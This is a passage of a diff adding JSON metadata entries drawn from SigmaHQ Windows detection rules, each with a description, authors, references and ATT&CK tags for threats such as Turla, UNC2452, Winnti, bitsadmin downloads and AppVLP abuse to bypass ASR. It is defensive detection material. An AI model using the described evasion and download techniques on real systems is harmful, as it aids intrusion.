"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml" + ], + "tags": [ + "attack.execution", + "attack.t1055.001" + ] + }, + "uuid": "d1aa3382-abab-446f-96ea-4de52908210b", + "value": "TAIDOOR RAT DLL Load" + }, + { + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "meta": { + "author": "@41thexplorer, Microsoft Defender ATP", + "creation_date": "2019/11/12", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_apt_tropictrooper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "value": "TropicTrooper Campaign November 2018" + }, + { + "description": "Detects automated lateral movement by Turla group", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/11/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_turla_commands_critical.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ] + }, + "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "value": "Turla Group Lateral Movement" + }, + { + "description": "Detects automated lateral movement by Turla group", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/11/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_turla_commands_medium.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_medium.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ] + }, + "uuid": "75925535-ca97-4e0a-a850-00b5c00779dc", + "value": "Automated Turla Group Lateral Movement" + }, + { + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_turla_comrat_may20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" + ] + }, + "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "value": "Turla Group Commands May 2020" + }, + { + "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_unc2452_cmds.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "value": "UNC2452 Process Creation Patterns" + }, + { + "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_unc2452_ps.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1047" + ] + }, + "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c", + "value": "UNC2452 PowerShell Pattern" + }, + { + "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", + "meta": { + "author": "@41thexplorer, Microsoft Defender ATP", + "creation_date": "2018/11/20", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_apt_unidentified_nov_18.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/DrunkBinary/status/1063075530180886529", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unidentified_nov_18.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218.011" + ] + }, + "uuid": "7453575c-a747-40b9-839b-125a0aae324b", + "value": "Unidentified Attacker November 2018" + }, + { + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "meta": { + "author": "Florian Roth, Markus Neis", + "creation_date": "2020/02/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" + ] + }, + "uuid": "3121461b-5aa0-4a41-b910-66d25524edbb", + "value": "Winnti Malware HK University Campaign" + }, + { + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2020/07/30", + "falsepositive": [ + "Legitimate setups that use similar flags" + ], + "filename": "proc_creation_win_apt_winnti_pipemon.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" + ] + }, + "uuid": "73d70463-75c9-4258-92c6-17500fe972f2", + "value": "Winnti Pipemon Characteristics" + }, + { + "description": "Detects activity mentioned in Operation Wocao report", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2019/12/20", + "falsepositive": [ + "Administrators that use checkadmin.exe tool to enumerate local administrators" + ], + "filename": "proc_creation_win_apt_wocao.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "value": "Operation Wocao Activity" + }, + { + "description": "Detects a ZxShell start by the called and well-known function name", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2017/07/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_zxshell.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.defense_evasion", + "attack.t1218.011", + "attack.s0412", + "attack.g0001" + ] + }, + "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc", + "value": "ZxShell Malware" + }, + { + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml" + ], + "tags": [ + "attack.t1204", + "attack.t1566.001", + "attack.execution", + "attack.initial_access" + ] + }, + "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms" + }, + { + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/07", + "falsepositive": [ + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + ], + "filename": "proc_creation_win_archiver_iso_phishing.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/1ZRR4H/status/1534259727059787783", + "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566" + ] + }, + "uuid": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "value": "Phishing Pattern ISO in Archive" + }, + { + "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "meta": { + "author": "Sreeman", + "creation_date": "2020/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_asr_bypass_via_appvlp_re.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_asr_bypass_via_appvlp_re.yml" + ], + "tags": [ + "attack.t1218", + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "value": "Using AppVLP To Circumvent ASR File Path Rule" + }, + { + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/09/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", + "https://github.com/h3v0x/CVE-2021-26084_Confluence", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" + ] + }, + "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11", + "value": "Atlassian Confluence CVE-2021-26084" + }, + { + "description": "Detects usage of attrib.exe to hide files from users.", + "meta": { + "author": "Sami Ruohonen", + "creation_date": "2019/01/16", + "falsepositive": [ + "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "Msiexec.exe hiding desktop.ini" + ], + "filename": "proc_creation_win_attrib_hiding_files.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "4281cb20-2994-4580-aa63-c8b86d019934", + "value": "Hiding Files with Attrib.exe" + }, + { + "description": "Marks a file as a system file using the attrib.exe utility", + "meta": { + "author": "frack113", + "creation_date": "2022/02/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_attrib_system.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", + "value": "Set Windows System File with Attrib" + }, + { + "description": "Detects usage of attrib with \"+s\" option to set suspicious script or executable as system files to hide them from users and make them unable to delete with simple rights. The rule limit the search to specific extensions and directories to avoid FP's", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_attrib_system_susp_paths.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", + "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "efec536f-72e8-4656-8960-5e85d091345b", + "value": "Set Suspicious Files as System Files Using Attrib" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_automated_collection.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_automated_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "value": "Automated Collection Command Prompt" + }, + { + "description": "Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.", + "meta": { + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard", + "creation_date": "2020/10/23", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_bad_opsec_sacrificial_processes.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", + "https://www.cobaltstrike.com/help-opsec", + "https://twitter.com/CyberRaiju/status/1251492025678983169", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments" + }, + { + "description": "Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets", + "meta": { + "author": "pH-T", + "creation_date": "2022/05/31", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_base64_invoke_susp_cmdlets.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "fd6e2919-3936-40c9-99db-0aa922c356f7", + "value": "Malicious Base64 Encoded Powershell Invoke Cmdlets" + }, + { + "description": "Detects base64 encoded listing Win32_Shadowcopy", + "meta": { + "author": "Christian Burkard", + "creation_date": "2022/03/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_base64_listing_shadowcopy.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_listing_shadowcopy.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "47688f1b-9f51-4656-b013-3cc49a166a36", + "value": "Base64 Encoded Listing of Shadowcopy" + }, + { + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "meta": { + "author": "Christian Burkard, pH-T", + "creation_date": "2022/03/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_base64_reflective_assembly_load.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027", + "attack.t1620" + ] + }, + "uuid": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", + "value": "Base64 Encoded Reflective Assembly Load" + }, + { + "description": "Detects usage of bitsadmin downloading a file", + "meta": { + "author": "Michael Haag, FPT.EagleEye", + "creation_date": "2017/03/09", + "falsepositive": [ + "Some legitimate apps use this, but limited." + ], + "filename": "proc_creation_win_bitsadmin_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "value": "Bitsadmin Download" + }, + { + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Some legitimate apps use this, but limited." + ], + "filename": "proc_creation_win_bitsadmin_download_susp_domain.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "value": "Bitsadmin Download from Suspicious Domain" + }, + { + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_bitsadmin_download_susp_ext.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "value": "Bitsadmin Download File with Suspicious Extension" + }, + { + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_bitsadmin_download_susp_ip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "99c840f2-2012-46fd-9141-c761987550ef", + "value": "Bitsadmin Download File from IP" + }, + { + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "value": "Bitsadmin Download to Suspicious Target Folder" + }, + { + "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", + "value": "Bitsadmin Download to Uncommon Target Folder" + }, + { + "description": "Identifies use of the bcdedit command to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_bootconf_mod.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "value": "Modification of Boot Configuration" + }, + { + "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", + "meta": { + "author": "pH-T, Nasreddine Bencherchali (update)", + "creation_date": "2022/07/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_browser_remote_debugging.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", + "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1185" + ] + }, + "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "value": "Browser Started with Remote Debugging" + }, + { + "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash", + "meta": { + "author": "Markus Neis, Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_bypass_squiblytwo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", + "https://twitter.com/mattifestation/status/986280382042595328", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "value": "SquiblyTwo Execution" + }, + { + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "meta": { + "author": "Nasreddine Bencherchali, Florian Roth", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_c2_sliver.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c2_sliver.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "42333b2c-b425-441c-b70e-99404a17170f", + "value": "Sliver C2 Implant Activity Pattern" + }, + { + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "meta": { + "author": "Alfie Champion (ajpc500)", + "creation_date": "2021/06/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_c3_load_by_rundll32.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c3_load_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": 